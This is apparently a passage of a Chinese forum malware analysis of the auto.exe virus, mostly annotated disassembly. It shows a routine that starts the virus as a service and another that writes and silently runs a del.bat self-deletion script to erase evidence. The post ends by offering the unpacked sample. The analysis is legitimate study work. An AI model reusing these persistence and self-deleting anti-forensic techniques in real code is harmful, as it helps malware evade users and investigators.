  00402F3E                 push    0F003Fh         ; dwDesiredAccess
  00402F43                 push    0               ; lpDatabaseName
  00402F45                 push    0               ; lpMachineName
  00402F47                 call    ds:OpenSCManagerA ; Establish a connection to the service
  00402F47                                         ; control manager on the specified computer
  00402F47                                         ; and opens the specified database
  00402F4D                 mov     edi, eax
  00402F4F                 test    edi, edi
  00402F51                 jz      short loc_402F80
  00402F53                 push    0F01FFh         ; dwDesiredAccess
  00402F58                 push    [esp+4+lpServiceName] ; lpServiceName
  00402F5C                 push    edi             ; hSCManager
  00402F5D                 call    ds:OpenServiceA
  00402F63                 mov     esi, eax
  00402F65                 test    esi, esi
  00402F67                 jz      short loc_402F80
  00402F69                 push    0               ; lpServiceArgVectors
  00402F6B                 push    0               ; dwNumServiceArgs
  00402F6D                 push    esi             ; hService
  00402F6E                 call    ds:StartServiceA
  00402F74                 push    esi             ; hSCObject
  00402F75                 mov     esi, ds:CloseServiceHandle
  00402F7B                 call    esi ; CloseServiceHandle
  00402F7D                 push    edi             ; hSCObject
  00402F7E                 call    esi ; CloseServiceHandle
  00402F80
  00402F80 loc_402F80:
  00402F80
  00402F80                 pop     edi
  00402F81                 pop     esi
  00402F82                 retn
  00402F82 StartVirusService endp
}
00402BEC                 add     esp, 1Ch

【第七宗罪】 毁尸灭迹

    不要以为 auto.exe 是个头脑简单的家伙,它干了坏事以后也是要消灭罪证的。想知道如何删除正在运行的程序文件吗?仔细看看下面的代码:

00402BEF                 cmp     [ebp+var_SysInfectFlag], 0
00402BF3                 jnz     short loc_402BFA
00402BF5                 call    Del_InfectingHost ; 如果当前运行病毒实例不是系统目录下的实例
00402BF5                                         ; 则在运行完毕以后删除该实例
{
  004012E2 Del_InfectingHost proc near
  004012E2
  004012E2 var_szDelCmdLine= byte ptr -408h
  004012E2 var_szFilename  = byte ptr -308h
  004012E2 var_szSysDirName= byte ptr -208h
  004012E2 Buffer          = dword ptr -108h
  004012E2 hObject         = dword ptr -8
  004012E2 NumberOfBytesWritten= dword ptr -4
  004012E2
  004012E2                 push    ebp
  004012E3                 mov     ebp, esp
  004012E5                 sub     esp, 408h
  004012EB                 push    ebx
  004012EC                 push    esi
  004012ED                 push    edi
  004012EE                 mov     edi, offset byte_410F20
  …………………………
  …………………………
  00401577                 lea     eax, [ebp+var_szFilename]
  0040157D                 push    0FFh            ; nSize
  00401582                 push    eax             ; lpFilename
  00401583                 push    ebx             ; hModule
  00401584                 call    ds:GetModuleFileNameA
  0040158A                 lea     eax, [ebp+var_szSysDirName]
  00401590                 push    0FEh            ; uSize
  00401595                 push    eax             ; lpBuffer
  00401596                 call    ds:GetSystemDirectoryA
  0040159C                 test    eax, eax
  0040159E                 jnz     short loc_4015A8
  004015A0                 or      eax, 0FFFFFFFFh
  004015A3                 jmp     loc_401838
  004015A8 ; ----------------------------------------------------------------------------
  004015A8
  004015A8 loc_4015A8:
  004015A8                 lea     eax, [ebp+var_szSysDirName]
  004015AE                 push    offset asc_410B74 ; "\\"
  004015B3                 push    eax
  004015B4                 call    strcat
  004015B9                 mov     ebx, ds:lstrcpy
  004015BF                 pop     ecx
  004015C0                 pop     ecx
  004015C1                 lea     eax, [ebp+var_szSysDirName]
  004015C7                 push    eax
  004015C8                 lea     eax, [ebp+var_szDelCmdLine]
  004015CE                 push    eax
  004015CF                 call    ebx ; lstrcpy
  004015D1                 lea     eax, [ebp+var_szDelCmdLine]
  004015D7                 push    offset aDel_bat ; "del.bat"
  004015DC                 push    eax
  004015DD                 call    ds:lstrcat
  004015E3                 lea     eax, [ebp+var_szSysDirName]
  004015E9                 push    offset aDd33gsd2_exe_0 ; "dd33gsd2.exe"
  004015EE                 push    eax
  004015EF                 call    strcat
  004015F4                 mov     esi, ds:CharUpperA
  004015FA                 pop     ecx
  004015FB                 pop     ecx
  004015FC                 lea     eax, [ebp+var_szSysDirName]
  00401602                 push    eax             ; lpsz
  00401603                 call    esi ; CharUpperA
  00401605                 push    eax
  00401606                 lea     eax, [ebp+var_szFilename]
  0040160C                 push    eax             ; lpsz
  0040160D                 call    esi ; CharUpperA
  0040160F                 push    eax
  00401610                 call    ds:lstrcmp      ; 比较当前目录是否为系统目录?
  00401616                 push    1
  00401618                 test    eax, eax
  0040161A                 pop     edi
  0040161B                 jz      loc_401836      ; 是系统目录则放弃接下去的清除操作
  00401621                 mov     esi, ds:Sleep
  00401627                 push    edi             ; dwMilliseconds
  00401628                 call    esi ; Sleep
  0040162A                 push    edi             ; dwMilliseconds
  0040162B                 call    esi ; Sleep
  0040162D                 push    edi             ; dwMilliseconds
  0040162E                 call    esi ; Sleep
  00401630                 push    edi             ; dwMilliseconds
  00401631                 call    esi ; Sleep
  00401633                 xor     eax, eax
  00401635                 push    eax             ; hTemplateFile
  00401636                 push    eax             ; dwFlagsAndAttributes
  00401637                 push    2               ; dwCreationDisposition
  00401639                 push    eax             ; lpSecurityAttributes
  0040163A                 push    eax             ; dwShareMode
  0040163B                 lea     eax, [ebp+var_szDelCmdLine]
  00401641                 push    40000000h       ; dwDesiredAccess
  00401646                 push    eax             ; lpFileName
  00401647                 call    ds:CreateFileA  ; 建立del.bat毁灭证据
  0040164D                 cmp     eax, 0FFFFFFFFh
  00401650                 mov     [ebp+hObject], eax
  00401653                 jz      loc_40181E
  00401659                 lea     eax, [ebp+Buffer]
  0040165F                 push    offset a@echoOff ; "@echo off\r\n"
  00401664                 push    eax             ; 偷偷干,屏幕上不准显示
  00401665                 call    strcpy
  0040166A                 pop     ecx
  0040166B                 pop     ecx
  0040166C                 push    edi             ; dwMilliseconds
  0040166D                 call    esi ; Sleep
  0040166F                 push    edi             ; dwMilliseconds
  00401670                 call    esi ; Sleep
  00401672                 push    edi             ; dwMilliseconds
  00401673                 call    esi ; Sleep
  00401675                 push    edi             ; dwMilliseconds
  00401676                 call    esi ; Sleep
  00401678                 push    edi             ; dwMilliseconds
  00401679                 call    esi ; Sleep
  0040167B                 push    edi             ; dwMilliseconds
  0040167C                 call    esi ; Sleep
  0040167E                 push    edi             ; dwMilliseconds
  0040167F                 call    esi ; Sleep
  00401681                 push    edi             ; dwMilliseconds
  00401682                 call    esi ; Sleep
  00401684                 push    edi             ; dwMilliseconds
  00401685                 call    esi ; Sleep
  00401687                 push    edi             ; dwMilliseconds
  00401688                 call    esi ; Sleep
  0040168A                 push    edi             ; dwMilliseconds
  0040168B                 call    esi ; Sleep
  0040168D                 push    edi             ; dwMilliseconds
  0040168E                 call    esi ; Sleep
  00401690                 mov     esi, ds:lstrlen
  00401696                 lea     eax, [ebp+NumberOfBytesWritten]
  00401699                 push    0               ; lpOverlapped
  0040169B                 push    eax             ; lpNumberOfBytesWritten
  0040169C                 lea     eax, [ebp+Buffer]
  004016A2                 push    eax
  004016A3                 call    esi ; lstrlen
  004016A5                 mov     edi, ds:WriteFile
  004016AB                 push    eax             ; nNumberOfBytesToWrite
  004016AC                 lea     eax, [ebp+Buffer]
  004016B2                 push    eax             ; lpBuffer
  004016B3                 push    [ebp+hObject]   ; hFile
  004016B6                 call    edi ; WriteFile
  004016B8                 lea     eax, [ebp+Buffer]
  004016BE                 push    offset aSelfkill ; ":selfkill\r\n"
  004016C3                 push    eax
  004016C4                 call    strcpy
  004016C9                 pop     ecx
  004016CA                 lea     eax, [ebp+NumberOfBytesWritten]
  004016CD                 pop     ecx
  004016CE                 push    0               ; lpOverlapped
  004016D0                 push    eax             ; lpNumberOfBytesWritten
  004016D1                 lea     eax, [ebp+Buffer]
  004016D7                 push    eax
  004016D8                 call    esi ; lstrlen
  004016DA                 push    eax             ; nNumberOfBytesToWrite
  004016DB                 lea     eax, [ebp+Buffer]
  004016E1                 push    eax             ; lpBuffer
  004016E2                 push    [ebp+hObject]   ; hFile
  004016E5                 call    edi ; WriteFile
  004016E7                 lea     eax, [ebp+Buffer]
  004016ED                 push    offset aDelFQ   ; "del /F /Q \""
  004016F2                 push    eax             ; 干完坏事就自杀
  004016F3                 call    strcpy
  004016F8                 pop     ecx
  004016F9                 lea     eax, [ebp+NumberOfBytesWritten]
  004016FC                 pop     ecx
  004016FD                 push    0               ; lpOverlapped
  004016FF                 push    eax             ; lpNumberOfBytesWritten
  00401700                 lea     eax, [ebp+Buffer]
  00401706                 push    eax
  00401707                 call    esi ; lstrlen
  00401709                 push    eax             ; nNumberOfBytesToWrite
  0040170A                 lea     eax, [ebp+Buffer]
  00401710                 push    eax             ; lpBuffer
  00401711                 push    [ebp+hObject]   ; hFile
  00401714                 call    edi ; WriteFile
  00401716                 lea     eax, [ebp+var_szFilename] ; 病毒文件名
  0040171C                 push    eax
  0040171D                 lea     eax, [ebp+Buffer]
  00401723                 push    eax
  00401724                 call    strcpy
  00401729                 pop     ecx
  0040172A                 lea     eax, [ebp+NumberOfBytesWritten]
  0040172D                 pop     ecx
  0040172E                 push    0               ; lpOverlapped
  00401730                 push    eax             ; lpNumberOfBytesWritten
  00401731                 lea     eax, [ebp+Buffer]
  00401737                 push    eax
  00401738                 call    esi ; lstrlen
  0040173A                 push    eax             ; nNumberOfBytesToWrite
  0040173B                 lea     eax, [ebp+Buffer]
  00401741                 push    eax             ; lpBuffer
  00401742                 push    [ebp+hObject]   ; hFile
  00401745                 call    edi ; WriteFile
  00401747                 lea     eax, [ebp+Buffer]
  0040174D                 push    offset asc_410B44 ; "\"\r\n"
  00401752                 push    eax
  00401753                 call    ebx ; lstrcpy
  00401755                 lea     eax, [ebp+NumberOfBytesWritten]
  00401758                 push    0               ; lpOverlapped
  0040175A                 push    eax             ; lpNumberOfBytesWritten
  0040175B                 lea     eax, [ebp+Buffer]
  00401761                 push    eax
  00401762                 call    esi ; lstrlen
  00401764                 push    eax             ; nNumberOfBytesToWrite
  00401765                 lea     eax, [ebp+Buffer]
  0040176B                 push    eax             ; lpBuffer
  0040176C                 push    [ebp+hObject]   ; hFile
  0040176F                 call    edi ; WriteFile
  00401771                 lea     eax, [ebp+Buffer]
  00401777                 push    offset aIfExist ; "if exist \""
  0040177C                 push    eax
  0040177D                 call    ebx ; lstrcpy
  0040177F                 lea     eax, [ebp+NumberOfBytesWritten]
  00401782                 push    0               ; lpOverlapped
  00401784                 push    eax             ; lpNumberOfBytesWritten
  00401785                 lea     eax, [ebp+Buffer]
  0040178B                 push    eax
  0040178C                 call    esi ; lstrlen
  0040178E                 push    eax             ; nNumberOfBytesToWrite
  0040178F                 lea     eax, [ebp+Buffer]
  00401795                 push    eax             ; lpBuffer
  00401796                 push    [ebp+hObject]   ; hFile
  00401799                 call    edi ; WriteFile
  0040179B                 lea     eax, [ebp+var_szFilename] ; 病毒文件名
  004017A1                 push    eax
  004017A2                 lea     eax, [ebp+Buffer]
  004017A8                 push    eax
  004017A9                 call    ebx ; lstrcpy
  004017AB                 lea     eax, [ebp+NumberOfBytesWritten]
  004017AE                 push    0               ; lpOverlapped
  004017B0                 push    eax             ; lpNumberOfBytesWritten
  004017B1                 lea     eax, [ebp+Buffer]
  004017B7                 push    eax
  004017B8                 call    esi ; lstrlen
  004017BA                 push    eax             ; nNumberOfBytesToWrite
  004017BB                 lea     eax, [ebp+Buffer]
  004017C1                 push    eax             ; lpBuffer
  004017C2                 push    [ebp+hObject]   ; hFile
  004017C5                 call    edi ; WriteFile
  004017C7                 lea     eax, [ebp+Buffer]
  004017CD                 push    offset aGotoSelfkill ; "\" goto selfkill\r\n"
  004017D2                 push    eax
  004017D3                 call    ebx ; lstrcpy
  004017D5                 lea     eax, [ebp+NumberOfBytesWritten]
  004017D8                 push    0               ; lpOverlapped
  004017DA                 push    eax             ; lpNumberOfBytesWritten
  004017DB                 lea     eax, [ebp+Buffer]
  004017E1                 push    eax
  004017E2                 call    esi ; lstrlen
  004017E4                 push    eax             ; nNumberOfBytesToWrite
  004017E5                 lea     eax, [ebp+Buffer]
  004017EB                 push    eax             ; lpBuffer
  004017EC                 push    [ebp+hObject]   ; hFile
  004017EF                 call    edi ; WriteFile
  004017F1                 lea     eax, [ebp+Buffer]
  004017F7                 push    offset dword_410B18
  004017FC                 push    eax
  004017FD                 call    ebx ; lstrcpy
  004017FF                 push    0               ; lpOverlapped
  00401801                 lea     eax, [ebp+NumberOfBytesWritten]
  00401804                 push    eax             ; lpNumberOfBytesWritten
  00401805                 lea     eax, [ebp+Buffer]
  0040180B                 push    eax
  0040180C                 call    esi ; lstrlen
  0040180E                 push    eax             ; nNumberOfBytesToWrite
  0040180F                 lea     eax, [ebp+Buffer]
  00401815                 push    eax             ; lpBuffer
  00401816                 push    [ebp+hObject]   ; hFile
  00401819                 call    edi ; WriteFile
  0040181B                 push    1
  0040181D                 pop     edi
  0040181E
  0040181E loc_40181E:
  0040181E                 push    [ebp+hObject]   ; hObject
  00401821                 call    ds:CloseHandle
  00401827                 lea     eax, [ebp+var_szDelCmdLine]
  0040182D                 push    SW_HIDE         ; uCmdShow
  0040182F                 push    eax             ; lpCmdLine
  00401830                 call    ds:WinExec      ; 执行del.bat
  00401836
  00401836 loc_401836:
  00401836                 mov     eax, edi
  00401838
  00401838 loc_401838:
  00401838                 pop     edi
  00401839                 pop     esi
  0040183A                 pop     ebx
  0040183B                 leave
  0040183C                 retn
  0040183C Del_InfectingHost endp
}
00402BFA

【总结】

    判处 auto.exe 病毒死刑,剥夺政治权利终身,此审为终审判决,不得上诉。

加个脱了壳的尸体:

上传的附件 Unpacked_auto.rar
解压密码:PEDIY